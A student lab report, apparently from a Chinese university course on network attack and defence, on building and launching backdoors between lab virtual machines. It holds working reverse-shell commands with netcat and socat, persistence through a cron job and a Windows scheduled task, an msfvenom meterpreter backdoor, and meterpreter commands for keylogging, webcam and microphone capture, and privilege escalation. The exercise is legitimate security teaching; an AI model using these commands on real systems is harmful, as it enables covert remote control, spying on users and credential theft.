2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践
(1)例举你能想到的一个后门进入到你系统中的可能方式?
在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:任务计划启动
linux:通过cron启动
(3)Meterpreter有哪些给你映像深刻的功能?
无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易。
(4)如何发现自己有系统有没有被安装后门?
通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。
实验前先查看win和linux的IP地址便于后面的实验。
Linux:192.168.199.128
Win7:192.168.199.229
学习ncat的使用
1.Win获得Linux Shell
- Win7打开cmd命令行,在ncat解压目录下,输入
ncat.exe -l -p 5228
对5228
端口进行监听 - 在Linux终端输入
nc 192.168.199.229 5228 -e /bin/sh
反弹连接Win75228
端口
- Win7已获得Linux shell,输入
ls
验证结果
成功
2.Linux获得Win Shell
Linux下打开一个终端,输入
nc -l -p 5228
对5228
端口进行监听在Win7命令行输入
ncat.exe -e cmd.exe 192.168.199.128 5228
反弹连接Linux5228
端口
Linux已获得Win7 shell,输入
dir
验证结果
成功
3.使用nc传输信息
Win7命令行输入
ncat.exe -l 5228
监听5228
端口Linux终端输入
nc 192.168.199.229 5228
反弹连接Win75228
端口
建立连接后可互传信息
4.使用nc传输文件
Win7命令行输入
ncat.exe -l 5228 > 2.txt
监听5228
端口,并设置收到的文件重定向保存到2.txt
Linux终端输入
nc 192.168.199.229 5228 < 1.txt
反弹连接Win75228
端口
Win7可收到Linux发来的文件。
实验内容
任务一:使用netcat获取主机操作Shell,cron启动
1、设定cron
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
- Win7中打开对端口
5228
端口的监听。
ncat.exe -l -p 5228
- Linux下使用
crontab -e
指令增加一条定时任务,-e
表示编辑 - 选择
3
,即编辑器。
根据m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
的格式添加最后一行33 * * * * /bin/netcat 192.168.199.229 5228 -e /bin/sh
保存退出
- 结果验证:Win7得到Linux Shell
任务二:使用socat获取主机操作Shell, 任务计划启动
1、新建任务计划
- 原理: 在主控机的nc打开对5228端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行
ncat.exe -e cmd.exe 192.168.199.128 5228
,从而反弹连接到Linux。即Linux得到Win7 shell。
新建触发器:当锁定任何用户的工作站时
新建操作:
启动程序:socat所在路径\socat.exe
添加参数:tcp-listen:5228 exec:cmd.exe,pty,stderr
2、锁定计算机,让该任务计划运行。再次唤醒计算机,可以看到刚新建的任务已启动,
3、Linux终端输入socat - tcp:192.168.199.229:5228
,结果验证:Linux得到了Win7 shell
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Linux终端执行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 199.128 LPORT=5228 -f exe > 20165228_backdoor.exe
生成后门程序20165228_backdoor.exe
Win7下执行
ncat.exe -l 5228 > 20165228_backdoor.exe
监听5228
端口,并将收到的文件重定向保存到20165228_backdoor.exe
Linux终端执行
nc 192.168.199.229 5228 < 20165228_backdoor.exe
反弹连接Win7并传输文件20165228_backdoor.exe
Linux终端执行
msfconsole
命令,并设置好IP地址和端口号
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
执行监听
Win7运行后门程序
Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic
录制一段音频
webcam_snap
使用摄像头拍照
keyscan_start
开始记录击键,keyscan_dump
读取记录
screenshot
进行截屏
getuid
查看当前用户并执行getsysyem
进行提权操作
实验中遇到的问题
1、我尝试过用Linux监听端口,Win7反弹连接Linux却提示由于目标计算机积极拒绝,无法连接
解决:尚未解决
2、在最后getsystem
获取权限时失败
解决:在尝试一些博客中的方法后,发现好像还是不行,但是了解到了msf使用的是自带的提权方法,只尝试了4个payload,所以大部分都会失败。
实验感想
- 此次实验的内容让我十分感兴趣,仅仅通过一些简单的指令就可以实现shell权限的获取,也让我明白了信息安全的重要性,特别是在尝试录音、拍照、截屏等操作后,让我认识到信息的泄露太可怕了。这让我更加想要学好网络攻防这门课,深入了解和掌握这些技能。
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
随机推荐
- Kotlin 使用类似C# 的yield功能
用过c#的可能对 yield 关键字爱不释手,那么在像我这种被迫上java贼船的人,就想找到类似的功能. 我使用的是kotlin,下面的方法演示了产生一个序列的功能. val fibonacciSeq ...
- linux bash array list
#定义array ptpArray=()while read linedo #将文件读取内容放到array中,注意作为字符串放,否则空格会被分隔成行ptpArray+=("$line&quo ...
- Ajax如何实现从前端不刷新页面就可以到后端取到数据
提到axaj很多人总说很难,什么回调函数呀等等就让人心烦,其实懂得ajax在js里面是如何实现向服务器请求数据的原理,那么理解ajax也就不是很难了,现在我们一起来看看. ajax作用:ajax技术的 ...
- idea函数被调用
打开一个复杂的程序或者项目进行分析的时候,我们就需要知道一个方法在哪里被调用,用于迅速厘清代码逻辑.操作如下:选中函数,右键,点击Find Usages. 如图: 操作简单,但右键还是没有快捷键方便. ...
- 怎么让html中 还是显示<button> 而不进行编译
toTXT(str) { var RexStr = /\<|\>|\"|\'|\&| | /g str = str.replace(RexStr, ...
- Response重定向实现参数隐藏
最近在弄一个SSH项目,前期已经做好了,现在的需求是进行单点登陆实现,涉及到重定向跳转(带有参数那种)情况,但是不能在地址栏上出现参数的信息,需要进行参数的隐藏跳转.由于时间比较急,本人没来得及开发一 ...
- 什么是ORM?
什么是ORM? MVC框架中重要的一部分就是ORM,实现了数据模型与数据库的解耦,即数据模型不需要依赖于特定的数据库,通过简单的配置就可以轻松更换数据库. ORM是对象关系映射的简称,主要任务是: 根 ...
- 类型限定词——const
类型限定词有三个:const volatile restrict. const:一般也叫常量修饰符. 作用:是修饰变量,被修饰的变量就变成常量了,不能被二次修改了. const int a=12:a ...
- Vue学习Day002
内联处理器的操作 除了直接绑定到一个方法,也可以在内联JavaScript语句中调用方法 <div id="example-3"> <button v-on:cl ...
- python入门(五)
一.函数返回值 1.函数如果返回多个值,他会把这几个值放到一个元组里面 2.也可以用多个变量来接收 返回多个值放到元组里面 def say(): num1=1 num2=2 num3=3 return ...